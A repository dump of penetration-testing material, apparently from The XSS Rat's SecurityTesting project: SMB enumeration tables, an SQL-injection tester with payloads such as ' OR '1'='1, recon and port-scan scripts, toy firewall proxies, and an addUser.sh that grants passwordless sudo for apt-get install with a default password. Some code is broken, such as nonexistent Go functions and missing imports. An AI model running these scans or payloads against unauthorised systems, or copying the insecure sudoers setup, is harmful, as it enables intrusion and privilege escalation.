blank password) and still potentially connect. | | 9 | | Check for vulnerabilities | nmap --script smb-vuln* -p 139,445 [ip] | | | 10 | | Overal scan | enum4linux -a [ip] | Example output is long, but some highlights to look for: output similar to nmblookup check for null session listing of shares domain info password policy RID cycling output | | 11 | | Manual recon | https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh Check pcap | Run on server Windows SMB is more complex than just a version, but looking in wireshark will give a bunch of information about the connection. We can filter on ntlmssp.ntlmv2_response to see NTLMv2 traffic, for example. | | 12 | -------------------------------------------------------------------------------- /OSCP/sshEnum.md: -------------------------------------------------------------------------------- 1 | | Enumeration step | Comment | Usefull refference | Goal | 2 | |----------------------------|---------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------| 3 | | Enumerate Hostname | nmblookup -A [ip] | | | 4 | | List Shares | smbmap -H [ip/hostname] | | | 5 | | "" | echo exit \| smbclient -L \\\\[ip] | exit takes care of any password request that might pop up, since we’re checking for null login -L - get a list of shares for the given host | | 6 | | "" | nmap --script smb-enum-shares -p 139,445 [ip] | | | 7 | | Check Null Sessions | smbmap -H [ip/hostname] | This command will show you the shares on the host, as well as your access to them. If you get credentials, you can re-run to show new access | | 8 | | "" | rpcclient -U "" -N [ip] smbclient \\\\[ip]\\[share name] | -U "" - null session -N - no password This will attempt to connect to the share. Can try without a password (or sending a blank password) and still potentially connect. | | 9 | | Check for vulnerabilities | nmap --script smb-vuln* -p 139,445 [ip] | | | 10 | | Overal scan | enum4linux -a [ip] | Example output is long, but some highlights to look for: output similar to nmblookup check for null session listing of shares domain info password policy RID cycling output | | 11 | | Manual recon | https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh Check pcap | Run on server Windows SMB is more complex than just a version, but looking in wireshark will give a bunch of information about the connection. We can filter on ntlmssp.ntlmv2_response to see NTLMv2 traffic, for example. | | 12 | -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-19-23.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-19-23.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-23-14.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-23-14.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-29-50.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Screenshot_from_2021-03-11_15-29-50.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 1.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 10.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 11.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 12.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 13.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 14.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 15.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 16.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 17.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 18.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 19.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 2.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 3.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 4.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 5.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 6.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 7.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 8.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled 9.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/Untitled.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/burpproject.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/burpproject.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/dashboard.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/dashboard.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/deploy.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/deploy.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/enter_to_procee.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/enter_to_procee.jpeg -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/h1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/h1.png -------------------------------------------------------------------------------- /Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/heroku_terms.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3/heroku_terms.jpeg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /RatFireWall/HorridAPIResponseFirewall/firewall.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from flask import Flask, request, jsonify 3 | 4 | app = Flask(__name__) 5 | 6 | PROXY_API_BASE_URL = 'https://api.example.com' # Replace with the API you want to proxy 7 | FORBIDDEN_KEYWORDS = ['password', 'api-key'] 8 | 9 | 10 | def inspect_response(json_data): 11 | for keyword in FORBIDDEN_KEYWORDS: 12 | if keyword in str(json_data).lower(): 13 | return True 14 | return False 15 | 16 | 17 | @app.route('/', methods=['GET', 'POST', 'PUT', 'DELETE']) 18 | def proxy_request(path): 19 | if request.method == 'GET': 20 | response = requests.get(f'{PROXY_API_BASE_URL}/{path}', params=request.args) 21 | elif request.method == 'POST': 22 | response = requests.post(f'{PROXY_API_BASE_URL}/{path}', json=request.json) 23 | elif request.method == 'PUT': 24 | response = requests.put(f'{PROXY_API_BASE_URL}/{path}', json=request.json) 25 | elif request.method == 'DELETE': 26 | response = requests.delete(f'{PROXY_API_BASE_URL}/{path}', params=request.args) 27 | 28 | if response.status_code == 200 and response.headers['Content-Type'] == 'application/json': 29 | json_data = response.json() 30 | if inspect_response(json_data): 31 | return jsonify({"error": "Forbidden content in response"}), 403 32 | else: 33 | return jsonify(json_data), 200 34 | 35 | return response.content, response.status_code 36 | 37 | 38 | if __name__ == '__main__': 39 | app.run(host='0.0.0.0', port=8080) 40 | -------------------------------------------------------------------------------- /RatFireWall/HorridAPIResponseFirewall/readme.md: -------------------------------------------------------------------------------- 1 | # Outgoing API Firewall Proxy 2 | This Python-Flask based outgoing API firewall proxy helps protect your application by inspecting JSON responses from an external API. It searches for specific forbidden keywords, such as "password" or "api-key", and blocks the response if it contains any of these words. The proxy supports GET, POST, PUT, and DELETE methods. 3 | 4 | ## Requirements 5 | - Python 3.6 or higher 6 | - Flask 7 | - Installation 8 | - Clone this repository: 9 | - Create a virtual environment and install dependencies: 10 | 11 | `python3 -m venv venv 12 | source venv/bin/activate 13 | pip install -r requirements.txt` 14 | 15 | ## Configuration 16 | Edit the app.py file and replace the PROXY_API_BASE_URL variable with the base URL of the API you want to proxy: 17 | 18 | `PROXY_API_BASE_URL = 'https://api.example.com'` 19 | 20 | Modify the FORBIDDEN_KEYWORDS list to include the keywords you want to block in the JSON response: 21 | 22 | 23 | `FORBIDDEN_KEYWORDS = ['password', 'api-key']` 24 | 25 | ## Running the proxy 26 | - Start the Flask app by running: 27 | 28 | `flask run --host=0.0.0.0 --port=8080` 29 | 30 | This will start the proxy on port 8080. You can now send requests to http://localhost:8080 followed by the API path you want to access. 31 | 32 | ## Usage 33 | Make requests to the proxy as you would to the actual API. For example, if the original API request is: 34 | 35 | `GET https://api.example.com/some/endpoint?param=value` 36 | 37 | You would make the same request to the proxy: 38 | 39 | `GET http://localhost:8080/some/endpoint?param=value` 40 | 41 | If the proxy detects any forbidden keywords in the JSON response, it will return a 403 Forbidden response with an error message. 42 | 43 | ## License 44 | This project is released under the MIT License. 45 | 46 | ## Contributing 47 | Pull requests and issues are welcome. Please feel free to contribute and help improve the project! 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /RatFireWall/HorridAPIResponseFirewall/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.1.1 2 | requests==2.27.1 3 | -------------------------------------------------------------------------------- /RatFireWall/firewall.py: -------------------------------------------------------------------------------- 1 | class Proxy: 2 | def __init__(self, rules): 3 | self.rules = rules 4 | 5 | def request(self, flow: http.HTTPFlow) -> None: 6 | # Check if the request matches any of the rules 7 | for rule in self.rules: 8 | if rule.matches_request(flow.request): 9 | # If the request matches the rule, block it 10 | flow.response = http.HTTPResponse.make( 11 | 403, "Forbidden", 12 | {"Content-Type": "text/html"}, 13 | b"Blocked by rule: %s" % rule.rule_name.encode('utf-8') 14 | ) 15 | 16 | def response(self, flow: http.HTTPFlow) -> None: 17 | # Check if the response matches any of the rules 18 | for rule in self.rules: 19 | if rule.matches_response(flow.request, flow.response): 20 | # If the response matches the rule, block it 21 | flow.response = http.HTTPResponse.make( 22 | 403, "Forbidden", 23 | {"Content-Type": "text/html"}, 24 | b"Blocked by rule: %s" % rule.rule_name.encode('utf-8') 25 | ) 26 | 27 | # Block requests with user agent containing "curl" 28 | rule1 = Rule("Block cURL requests", request_headers={"User-Agent": "curl"}) 29 | 30 | # Block responses with a "Set-Cookie" header 31 | rule2 = Rule("Block Set-Cookie responses", response_headers={"Set-Cookie": "*"}) 32 | 33 | # Block requests containing 134 | "> 135 | '> 136 | ``` 137 |
138 | 139 | ## 🧪 Sample Use Case 140 | 141 | - Test for SQLi: load `sqli.txt` from PREPOPLISTS, click fuzz 142 | - Use `FUZZ` keyword in body/URL to dynamically inject each value 143 | - Monitor results and status codes for anomalies 144 | 145 |
146 | 147 | ## 🛠 Tech Stack 148 | 149 | - Python 3 150 | - `Tkinter` for GUI 151 | - `Requests` for HTTP handling 152 | - JSON for Swagger parsing and data exchange 153 | 154 |
155 | 156 | ## 🧑‍💻 Author 157 | 158 | Developed by **THE XSSRAT** 159 | 160 |
161 | 162 | ## 📜 License 163 | 164 | MIT License – feel free to use and modify with credit. 165 | -------------------------------------------------------------------------------- /Scripts/RatAPIChat/SQLiByAPISpec.py: -------------------------------------------------------------------------------- 1 | import tkinter as tk 2 | from tkinter import messagebox, scrolledtext, filedialog 3 | import json 4 | import time 5 | import threading 6 | import requests 7 | 8 | # Function to load OpenAPI specification from a local file 9 | def load_openapi_spec(file_path): 10 | try: 11 | with open(file_path, 'r') as file: 12 | return json.load(file) 13 | except Exception as e: 14 | messagebox.showerror("Error", f"An error occurred while loading the OpenAPI spec: {e}") 15 | return None 16 | 17 | # Function to test an endpoint for SQL injection 18 | def test_endpoint(base_url, path): 19 | url = base_url + path 20 | payloads = ["' OR '1'='1", '" OR "1"="1', "admin'--", 'admin"--'] 21 | for payload in payloads: 22 | test_url = f"{url}?param={payload}" 23 | try: 24 | response = requests.get(test_url) 25 | if "error" in response.text.lower(): # Simplified check for SQL error 26 | result_text.insert(tk.END, f"Potential SQLi detected at {test_url}\n") 27 | time.sleep(1) # To avoid overwhelming the server 28 | except Exception as e: 29 | result_text.insert(tk.END, f"Error testing {test_url}: {e}\n") 30 | 31 | # Function to start testing all endpoints 32 | def start_testing(): 33 | base_url = baseurl_entry.get() 34 | if not base_url: 35 | messagebox.showerror("Input Error", "Please enter the Base URL.") 36 | return 37 | 38 | file_path = file_entry.get() 39 | if not file_path: 40 | messagebox.showerror("Input Error", "Please load a valid OpenAPI file.") 41 | return 42 | 43 | spec = load_openapi_spec(file_path) 44 | if spec: 45 | paths = spec.get('paths', {}) 46 | for path in paths: 47 | threading.Thread(target=test_endpoint, args=(base_url, path)).start() 48 | else: 49 | messagebox.showerror("Error", "Invalid OpenAPI specification.") 50 | 51 | # Function to browse and load the OpenAPI file 52 | def browse_file(): 53 | file_path = filedialog.askopenfilename(filetypes=[("JSON Files", "*.json")]) 54 | if file_path: 55 | file_entry.delete(0, tk.END) 56 | file_entry.insert(0, file_path) 57 | 58 | # Set up the GUI 59 | root = tk.Tk() 60 | root.title("API SQL Injection Tester") 61 | 62 | # Base URL input 63 | tk.Label(root, text="Base URL:").pack(pady=5) 64 | baseurl_entry = tk.Entry(root, width=80) 65 | baseurl_entry.pack(pady=5) 66 | 67 | # File path input 68 | tk.Label(root, text="OpenAPI File:").pack(pady=5) 69 | file_entry = tk.Entry(root, width=80) 70 | file_entry.pack(pady=5) 71 | 72 | # Browse button for file 73 | browse_button = tk.Button(root, text="Browse", command=browse_file) 74 | browse_button.pack(pady=5) 75 | 76 | # Start button 77 | start_button = tk.Button(root, text="Start Testing", command=start_testing) 78 | start_button.pack(pady=20) 79 | 80 | # Results display 81 | result_text = scrolledtext.ScrolledText(root, height=20, width=80) 82 | result_text.pack(pady=5) 83 | 84 | root.mainloop() 85 | -------------------------------------------------------------------------------- /Scripts/RatAPIChat/readme.md: -------------------------------------------------------------------------------- 1 | # API Request Tool 2 | 3 | This tool allows you to send HTTP requests to a specified API endpoint, perform fuzzing on request parameters, and save/load your session history. It also supports authentication, proxy configuration, and the ability to load Swagger/OpenAPI definitions. 4 | 5 | ## Features 6 | 7 | - **Send API requests** with different HTTP methods (`GET`, `POST`, `PUT`, `DELETE`). 8 | - **Authentication Support**: Basic, Bearer, and OAuth 2.0. 9 | - **Fuzzing Parameters**: Allows you to fuzz request parameters by replacing `FUZZ` in the body with values from a list. 10 | - **Session Management**: Save and load API request history. 11 | - **Swagger/OpenAPI Import**: Import Swagger/OpenAPI definitions to automatically generate endpoints and request bodies. 12 | - **Export History**: Export request history to a CSV file. 13 | - **Proxy Support**: Support for setting up a proxy server (with Burp Suite certificate support). 14 | 15 | ## Installation 16 | 17 | To install the required dependencies using Python 3 and `venv`, follow these steps: 18 | 19 | **Set up a virtual environment:** 20 | 21 | ``` 22 | python3 -m venv venv 23 | ``` 24 | **Activate the virtual environment:** 25 | 26 | 27 | ### On macOS/Linux: 28 | 29 | ``` 30 | source venv/bin/activate 31 | ``` 32 | ### On Windows: 33 | 34 | ``` 35 | .\venv\Scripts\activate 36 | ``` 37 | 38 | ### Install the required dependencies: 39 | 40 | ``` 41 | pip install -r requirements.txt 42 | ``` 43 | 44 | ## Usage 45 | - API Endpoint: Enter the API endpoint URL. 46 | - Authentication: Select the type of authentication (Basic, Bearer, or OAuth 2.0). Enter the corresponding credentials or token. 47 | - Method: Choose the HTTP method (GET, POST, PUT, DELETE). 48 | - Request Body: For POST, PUT, and DELETE requests, enter the request body. You can use FUZZ as a placeholder to be replaced with fuzzing values. 49 | - Fuzzing: You can select pre-populated fuzzing lists or manually enter fuzz values to test your API endpoints with multiple values. 50 | - Proxy: Configure a proxy URL if needed. 51 | - Response: After sending the request, the response (status code and body) will be shown in the response section. 52 | - History: View a list of all previous requests and responses. You can select an entry to pre-populate the request fields. 53 | - Save/Load Session: Save your session to a file or load a previously saved session to continue your work. 54 | 55 | ## Files 56 | - requirements.txt: List of required Python packages. 57 | - last_session.json: Stores the history of your API requests. 58 | - preferences.json: Stores user preferences like proxy settings and Burp Suite certificate path. 59 | - burp_cert.pem: Burp Suite certificate for proxying HTTPS requests. 60 | - PREPOPLISTS: Folder containing pre-populated fuzzing lists. 61 | 62 | ## License 63 | This project is licensed under the MIT License - see the LICENSE file for details. 64 | -------------------------------------------------------------------------------- /Scripts/RatAPIChat/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | tkinter 3 | -------------------------------------------------------------------------------- /Scripts/RatAPIChat/test.json: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /Scripts/addUser.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "Enter the user name: " 3 | read userName 4 | 5 | mkdir /home/$userName 6 | chmod 767 /home/$userName/ 7 | 8 | sudo useradd -g Commands -d /home/$userName $userName 9 | echo "$userName ALL=(ALL) NOPASSWD:/usr/bin/apt-get install *" >> /etc/sudoers 10 | 11 | echo -e "test\ntest\n" | passwd $userName > /dev/null 2>&1 && echo " User account has been created." || echo " ERR -- User account creation failed!" 12 | 13 | echo "ssh $userName@45.79.218.21 - password is 'test' please change it ASAP" 14 | -------------------------------------------------------------------------------- /Scripts/autoScan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Check if the target argument was provided 4 | if [ $# -ne 1 ]; then 5 | echo "Usage: $0 " 6 | echo " where target can be a single IP address, range of IP addresses, or a subnet in CIDR notation" 7 | exit 1 8 | fi 9 | 10 | target=$1 11 | 12 | # Run Naabu scan on all TCP and UDP ports 13 | naabu -h $target -p-u > naabu_output.txt 14 | 15 | # Run Masscan scan on all TCP and UDP ports 16 | masscan $target -p- --rate=10000 > masscan_output.txt 17 | 18 | # Run Recon-ng scan 19 | recon-ng -r $target > recon-ng_output.txt 20 | 21 | # Run Nmap scan on all TCP and UDP ports 22 | nmap -sS -sU -p- -A $target > nmap_output.txt 23 | 24 | # Check if a web port was found 25 | if grep -q "80/tcp" nmap_output.txt || grep -q "443/tcp" nmap_output.txt; then 26 | echo "Web port found, running additional web tools..." 27 | 28 | # Run Gobuster scan 29 | gobuster dir -u http://$target -w /usr/share/wordlists/dirb/common.txt > gobuster_output.txt 30 | 31 | # Run Eyewitness scan 32 | eyewitness --web --threads=10 --no-prompt --prepend-https $target > eyewitness_output.txt 33 | 34 | # Run Nuclei scan 35 | nuclei -t templates/web-content/all-vulns.yaml -t templates/web-content/common-dirs.yaml $target > nuclei_output.txt 36 | 37 | # Run Nikto scan 38 | nikto -h $target > nikto_output.txt 39 | fi 40 | 41 | -------------------------------------------------------------------------------- /Scripts/goScan.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "net" 7 | "os" 8 | "strconv" 9 | "strings" 10 | "sync" 11 | "time" 12 | ) 13 | 14 | func scanPort(address string, port int, wg *sync.WaitGroup) { 15 | defer wg.Done() 16 | 17 | conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", address, port), time.Second*10) 18 | if err != nil { 19 | return 20 | } 21 | conn.Close() 22 | fmt.Println(address, "Port", port, "is open.") 23 | } 24 | 25 | func main() { 26 | fmt.Println("Enter IPs or a range of IPs (e.g. 192.168.1.1-192.168.1.100)") 27 | scanner := bufio.NewScanner(os.Stdin) 28 | scanner.Scan() 29 | input := scanner.Text() 30 | 31 | var ipAddresses []string 32 | if strings.Contains(input, "-") { 33 | ipRange := strings.Split(input, "-") 34 | startIP := net.ParseIP(ipRange[0]) 35 | endIP := net.ParseIP(ipRange[1]) 36 | 37 | start := net.IPToBigInt(startIP) 38 | end := net.IPToBigInt(endIP) 39 | for i := start; i <= end; i++ { 40 | ipAddresses = append(ipAddresses, net.BigIntToIP(i).String()) 41 | } 42 | } else { 43 | ipAddresses = strings.Split(input, " ") 44 | } 45 | 46 | start := time.Now() 47 | 48 | fmt.Println("Starting port scan on targets:", ipAddresses) 49 | 50 | var wg sync.WaitGroup 51 | for _, address := range ipAddresses { 52 | for port := 1; port <= 65535; port++ { 53 | wg.Add(1) 54 | go scanPort(address, port, &wg) 55 | } 56 | } 57 | wg.Wait() 58 | 59 | elapsed := time.Since(start) 60 | fmt.Println("Port scan completed in", elapsed) 61 | } 62 | -------------------------------------------------------------------------------- /Scripts/gobuster.sh: -------------------------------------------------------------------------------- 1 | helpFunction() 2 | { 3 | echo "" 4 | echo "Usage: $0 -a true/[EMPTY] -h domain.com -o main-site" 5 | echo -e "\t-u url(http://bla.domain.com/)" 6 | echo -e "\t-w Wordlist, default /Users/wesleythijs/Documents/BugBounties/SecurityTesting/wordlists/dirlist.txt" 7 | echo -e "\t-f domain list, leave empty if you want to do a single domain" 8 | echo -e "\t-m mode, default dir mode" 9 | exit 1 # Exit script after printing help 10 | } 11 | 12 | while getopts "u:w:m:" opt 13 | do 14 | case "$opt" in 15 | u ) parameterU="$OPTARG" ;; 16 | w ) parameterW="$OPTARG" ;; 17 | m ) parameterM="$OPTARG" ;; 18 | f ) parameterF="$OPTARG" ;; 19 | ? ) helpFunction ;; # Print helpFunction in case parameter is non-existent 20 | esac 21 | done 22 | 23 | if [ -z "$parameterW" ] 24 | then 25 | parameterW="/Users/wesleythijs/Documents/BugBounties/SecurityTesting/wordlists/dirlist.txt" 26 | fi 27 | 28 | if [ -z "$parameterM" ] 29 | then 30 | parameterM="dir" 31 | fi 32 | 33 | gobuster -w "$parameterW" "$parameterM" -u "$parameterU" -k 34 | -------------------------------------------------------------------------------- /Scripts/initialScan.sh: -------------------------------------------------------------------------------- 1 | tput setaf 2; 2 | echo "==========================================================" 3 | echo "Welcome to my Nub Script for automating Your initial scan of a domain." 4 | echo "" 5 | echo "Make sure you have nmap installed" 6 | echo "" 7 | echo "" 8 | echo "Usage: $0 -a true/[EMPTY] -h domain.com -o main-site" 9 | echo -e "\t-h Host(bla.domain.com or domain.com)" 10 | echo -e "\t-o OutputName" 11 | echo -e "\t-a OPTIONAL: Advanced(run portscan on all ports), set to value true" 12 | echo "==========================================================" 13 | tput sgr0; 14 | 15 | helpFunction() 16 | { 17 | echo "" 18 | echo "Usage: $0 -a true/[EMPTY] -h domain.com -o main-site" 19 | echo -e "\t-h Host(bla.domain.com or domain.com)" 20 | echo -e "\t-o OutputName" 21 | echo -e "\t-a OPTIONAL: Advanced(run portscan on all ports), set to value true" 22 | exit 1 # Exit script after printing help 23 | } 24 | 25 | while getopts "h:o:a:" opt 26 | do 27 | case "$opt" in 28 | h ) parameterH="$OPTARG" ;; 29 | o ) parameterO="$OPTARG" ;; 30 | a ) parameterA="$OPTARG" ;; 31 | ? ) helpFunction ;; # Print helpFunction in case parameter is non-existent 32 | esac 33 | done 34 | 35 | # Print helpFunction in case parameters are empty 36 | if [ -z "$parameterH" ] || [ -z "$parameterO" ] 37 | then 38 | echo "Some or all of the parameters are empty"; 39 | helpFunction 40 | fi 41 | 42 | #if advanced is set do a full portscan 43 | if [ "$parameterA" == "true" ] 44 | then 45 | echo "Scanning all ports...-p- -sC -sV -oA" 46 | nmap -p- -sC 